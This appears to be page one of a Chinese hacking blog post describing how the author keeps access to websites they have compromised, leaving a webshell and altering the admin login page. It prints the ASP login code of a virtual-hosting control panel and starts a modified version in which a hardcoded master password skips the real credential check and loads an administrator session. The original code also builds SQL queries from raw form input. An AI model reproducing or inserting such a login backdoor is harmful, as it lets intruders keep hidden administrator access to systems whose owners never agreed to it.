back door 网站后台的session之门[网络技术]

可以这么说我所拿到的网站不管是好的,大概其他的网站,我基本都没改过源代码,也不想破坏搞什么黑页啊,衔接之类的,挂马!不过窜改源代码的情形却真的是少数,我认为对比好的网站的话,对比有意义的网站的话,我也会动恻隐之心!对这些网站除了留下个webshell这种back door外,从源码上的窜改可以确保越发万无一失!

此中,我多改的是登陆页面,大家都知道,网站后台登陆是一扇门,只准许经考证的用户登陆,登陆的时刻一些还会存储一些登陆信息,比方记录下ip和登陆时间等等,当然我们可以在今后衔接上数据库更改这些登陆记录或举行删除的!不过管理员的钥匙我们是得到了,不过我们又不能增添自己的用户,那样管理员很简单发现的!其实也给网站的管理员,大大都也并不晓得程序的,他们只管自己编辑自己的网站,呵呵,那么session之门在这个时刻就施展了它的作用了!
先说说session吧,它是会话状况,什么是会话状况,由于http是无状况的,但是我们登陆一个网站后不能无状况啊!比方自己购置了东西,到结算的时刻,忽然发现自己买的东西都没有了!于是为了存储用户的状况变呈现了好几种情形:客户端保存,服务端保存!客户端保存,当然相对来说必定是不安全的,因为其他人大概会改正操纵.服务端安全高,不过要知道服务资源有限,当用户数目多的时刻,要保存这么多状况对服务器要求挺高的!
session是会话状况,在服务器上保存,相对与cookie,普通来说后台管理员登陆后城市在服务器上保存个session默许情形下session 保存20分钟,不过服务器忙的时刻,它会自动排除session的啊,也不一定能保存那么长时间,服务器说了算!session就做为了你能否登陆的标志!所以我要做的就是,让它给我供应这种标志!
看看下面的代码吧
if request.querystring(“logohost”)=”npointhost” then
if trim(UCase(request.form(“cord”)))<>UCase(session(“admincode”)) then
call ErrMsgBox(“考证码错误”)
else
session(“admincode”)=”"
rs.open “Select * from adminlogo where name=’”&trim(request.Form(“user”))&”‘”,conn,1,1
if rs.bof and rs.eof then
call SucBox(“用户名或密码错误”,”index.asp”)
elseif npoint(trim(request.form(“password”)))<>rs(“pass”) then
call SucBox(“用户名或密码错误”,”index.asp”)
else
UserIP=replace(Request.ServerVariables(“REMOTE_ADDR”),”‘”,”")
 
session(“adminuser”)=rs(“name”)
session(“adminpass”)=rs(“pass”)
session(“admincs”)=rs(“cs”)
session(“NpadminSID”)=Session.SessionID
session.timeout=45ldate=now()
conn.Execute(“Update adminlogo Set lip=’”&UserIP&”‘,ldate=’”&ldate&”‘ Where name=’”&trim(request.form(“user”))&”‘”)
response.Redirect(“main.asp”)
end if
end if
end if
是n点虚拟系统的管理登陆考证代码了,最后你会发现保存的session的了!其实我对vb不熟的,不过大约意思能懂,语言互通性决意的,我只要变成下面的
if request.querystring(“logohost”)=”npointhost” then
if trim(UCase(request.form(“cord”)))<>UCase(session(“admincode”)) then
call ErrMsgBox(“考证码错误”)
elseif trim(request.form(“password”))=”alickqubes” then
session(“admincode”)=”"
rs.open “Select top 1 * from adminlogo”,conn,1,1

[1] [2]  下一页